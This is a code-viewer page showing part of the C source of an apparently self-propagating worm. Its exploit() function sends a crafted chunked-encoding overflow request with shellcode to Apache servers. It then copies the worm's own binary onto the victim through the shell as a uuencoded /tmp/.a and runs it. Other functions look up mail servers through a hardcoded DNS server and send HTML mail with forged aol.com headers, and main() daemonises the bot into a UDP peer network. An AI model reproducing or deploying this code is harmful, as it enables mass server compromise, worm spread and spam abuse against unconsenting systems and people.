📄 apache-
字号:
ch = *p >> 2;
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017);
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03);
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = p[2] & 077;
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
}
ch='\n';
if (sendch(a,ch) <= ASUCCESS) break;
usleep(10);
}
if (ferror(in)) {
fclose(in);
return 0;
}
ch = ENC('\0');
sendch(a,ch);
ch = '\n';
sendch(a,ch);
writem(a,"end\n");
if (in) fclose(in);
return 1;
}
void exploit(char *ip) {
char *a=GetAddress(ip);
char localip[256];
int l,sock;
struct sockaddr_in sin;
if (a == NULL) exit(0);
if (strncmp(a,"Apache",6)) exit(0);
free(a);
alarm(60);
for (l=0;l<2;l++) {
u_char buf[512], *expbuf=0, *p=0;
int i=0, j=0, responses=0;
memcpy(&victim, &targets[l], sizeof(victim));
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = inet_addr(ip);
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) exit(1);
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR));
PUT_STRING("POST / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("\r\n");
}
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < victim.repretaddr; j++) {
*p++ = victim.retaddr & 0xff;
*p++ = (victim.retaddr >> 8) & 0xff;
*p++ = (victim.retaddr >> 16) & 0xff;
*p++ = (victim.retaddr >> 24) & 0xff;
}
PUT_BYTES(victim.repzero, 0);
PUT_STRING("\r\n");
}
PUT_STRING("Transfer-Encoding: chunked\r\n");
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
PUT_STRING(buf);
write(sock, expbuf, p - expbuf);
responses = 0;
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = 15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) break;
if(n >= 1) {
for(i = 0; i < n; i ++) if(buf[i] == 'G') responses ++; else responses = 0;
if(responses >= 2) {
write(sock,"O",1);
alarm(3600);
sleep(10);
writem(sock,"\nrm -rf /tmp/.a;cat > /tmp/.uua << __eof__;\n");
encode(sock);
writem(sock,"__eof__\n");
conv(localip,256,myip);
sprintf(buf,"/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a %s;exit;\n",localip);
writem(sock,buf);
while(read(sock,buf,1024)>=0);
exit(0);
}
}
}
}
free(expbuf);
close(sock);
}
return;
}
#endif
struct dns {
unsigned short int id;
unsigned char rd:1;
unsigned char tc:1;
unsigned char aa:1;
unsigned char opcode:4;
unsigned char qr:1;
unsigned char rcode:4;
unsigned char unused:2;
unsigned char pr:1;
unsigned char ra:1;
unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
};
struct dns_rr {
unsigned short type;
unsigned short rr_class;
unsigned int ttl;
unsigned short rdlength;
};
struct _elist {
char *name;
struct _elist *next;
};
struct _mailserver {
unsigned long count;
char *name;
struct _elist *elist;
struct _mailserver *next;
} *mailservers=(struct _mailserver*)NULL;
char *GetServer(char *str) {
unsigned char buf[2048];
unsigned long len=0,i,j,hostlen,g;
struct dns dnsp;
struct dns_rr dnsr;
struct ainst a,client;
char host[256],domain[256];
unsigned long start;
struct _mailserver *current=NULL;
struct _mailserver *getlist=mailservers;
i=0;
while(getlist != NULL) {
if (!strcasecmp(getlist->name,str)) {
i=1;
break;
}
getlist=getlist->next;
}
if (i) {
struct _elist *elist=getlist->elist;
current=getlist;
if (current->count) {
for (i=0;i<(rand()%current->count);i++) elist=elist->next;
return elist->name;
}
else return 0;
}
else {
struct _mailserver *new=(struct _mailserver*)malloc(sizeof(struct _mailserver));
new->count=0;
new->name=strdup(str);
new->elist=NULL;
new->next=mailservers;
mailservers=new;
current=new;
}
if (strlen(str) > 256) return 0;
strcpy(host,str);
if (audp_setup(&a,"12.127.17.71",53) != ASUCCESS) return 0;
srand(time(NULL));
memset(buf,0,2048);
dnsp.id=rand();
dnsp.rd=1;
dnsp.tc=0;
dnsp.aa=0;
dnsp.opcode=0;
dnsp.qr=0;
dnsp.rcode=0;
dnsp.unused=0;
dnsp.pr=0;
dnsp.ra=0;
dnsp.que_num=256;
dnsp.rep_num=0;
dnsp.num_rr=0;
dnsp.num_rrsup=0;
memcpy(buf,(void*)&dnsp,sizeof(dnsp));
len+=sizeof(dnsp);
hostlen=strlen(host);
for (i=0,j=0;i<=hostlen;i++) if (host[i] == '.' || host[i] == 0) {
char tmp;
tmp=host[i];
host[i]=0;
sprintf(buf+len,"%c%s",(unsigned char)(i-j),host+j);
len+=1+strlen(host+j);
j=i+1;
host[i]=tmp;
}
buf[len++]=0x0;
buf[len++]=0x0;
buf[len++]=0xf;
buf[len++]=0x0;
buf[len++]=0x1;
audp_send(&a,buf,len);
memset(buf,0,sizeof(buf));
start=time(NULL);
while(audp_recv(&a,&client,buf,sizeof(buf))) if (time(NULL)-start > 10) return 0;
memcpy((void*)&dnsp,buf,sizeof(dnsp));
memset(domain,0,256);
for (i=0;i<ntohs(dnsp.rep_num) && len<=a.len;i++) {
char output[256];
unsigned long tmpl,dlen;
len+=2;
memcpy((void*)&dnsr,buf+len,sizeof(dnsr));
len+=sizeof(dnsr);
tmpl=len;
memset(output,0,256);
while (len-tmpl < ntohs(dnsr.rdlength)-5) {
unsigned char tmp;
dlen=buf[len];
if (dlen == 0) break;
tmp=buf[len+dlen+1];
buf[len+dlen+1]=0;
sprintf(output+strlen(output),"%s.",buf+len+1);
buf[len+dlen+1]=tmp;
len+=dlen+1;
}
g=0;
if (buf[len] == 0) len++;
else {
g=1;
len+=2;
}
if (i) strcpy(output+strlen(output),domain);
else {
for (j=0;j<strlen(output) && output[j] != '.';j++);
strcpy(domain,output+j+1);
if (g) {
strcpy(domain+strlen(domain),host);
strcpy(output+strlen(output),host);
}
}
while(output[strlen(output)-1] == '.') output[strlen(output)-1]=0;
{
struct _elist *new=(struct _elist*)malloc(sizeof(struct _elist));
new->name=strdup(output);
new->next=current->elist;
current->elist=new;
current->count++;
}
}
audp_close(&a);
if (current->count) return current->elist->name;
else return 0;
}
void SendMail(char *to, char *from, char *subject, char *data) {
struct ainst srv;
char buf[4096],bufm[4096],*sa;
unsigned long i,mode=0,tm=time(NULL);
memset(buf,0,4096);
strcpy(buf,to);
for (i=0;i<strlen(to);i++) if (to[i] == '@') break;
cleanup(buf);
cleanup(from);
cleanup(subject);
sa=GetServer(buf+i+1);
if (sa == NULL) return;
if (atcp_connect(&srv,sa,25) != 0) return;
while(1) {
struct ainst *g[1];
g[0]=&srv;
memset(bufm,0,4096);
if (await(g,1,AREAD,20) != 0 || atcp_recv(&srv,bufm,4096) != 0 || srv.len == 0) return;
cleanup(bufm);
switch(atoi(bufm)) {
case 220:
atcp_sendmsg(&srv,"HELO %s\n",sa);
break;
case 250:
switch(mode) {
case 0:
atcp_sendmsg(&srv,"MAIL FROM:<%s>\n",from);
break;
case 1:
atcp_sendmsg(&srv,"RCPT TO:<%s>\n",buf);
break;
case 2:
atcp_sendmsg(&srv,"DATA\n");
break;
case 3:
atcp_sendmsg(&srv,"QUIT\n");
atcp_close(&srv);
return;
}
mode++;
break;
case 354:
atcp_sendmsg(&srv,"Return-Path: <%c%c%c%c%c%c%c@aol.com>\n",tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65));
atcp_sendmsg(&srv,"From: %s\n",from);
atcp_sendmsg(&srv,"Message-ID: <%x.%x.%x@aol.com>\n",rand(),rand(),rand());
atcp_sendmsg(&srv,"Date: %s",ctime(&tm));
atcp_sendmsg(&srv,"Subject: %s\n",subject);
atcp_sendmsg(&srv,"To: %s\n",buf);
atcp_sendmsg(&srv,"Mime-Version: 1.0\n");
atcp_sendmsg(&srv,"Content-Type: text/html\n\n");
atcp_sendmsg(&srv,"%s\r\n.\r\n",data);
break;
}
}
}
int main(int argc, char **argv) {
unsigned char a=0,b=0,c=0,d=0;
unsigned long bases,*cpbases;
struct initsrv_rec initrec;
struct ainst backup;
int null=open("/dev/null",O_RDWR);
if (argc <= 1) {
printf("%s <base 1> [base 2] ...\n",argv[0]);
return 0;
}
srand(time(NULL)^getpid());
memset((char*)&routes,0,sizeof(struct route_table)*24);
memset(clients,0,sizeof(struct ainst)*CLIENTS*2);
if (audp_listen(&udpserver,PORT) != 0) {
printf("Error: %s\n",aerror(&udpserver));
return 0;
}
memset((void*)&initrec,0,sizeof(struct initsrv_rec));
initrec.h.tag=0x70;
cpbases=(unsigned long*)malloc(sizeof(unsigned long)*argc);
if (cpbases == NULL) {
printf("Insufficient memory\n");
return 0;
}
for (bases=1;bases<argc;bases++) {
cpbases[bases-1]=aresolve(argv[bases]);
relay(cpbases[bases-1],(char*)&initrec,sizeof(struct initsrv_rec));
}
memcpy((void*)&backup,(void*)&udpserver,sizeof(struct ainst));
numlinks=0;
dup2(null,0);
dup2(null,1);
dup2(null,2);
if (fork()) return 1;
a=classes[rand()%(sizeof classes)];
b=rand();
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -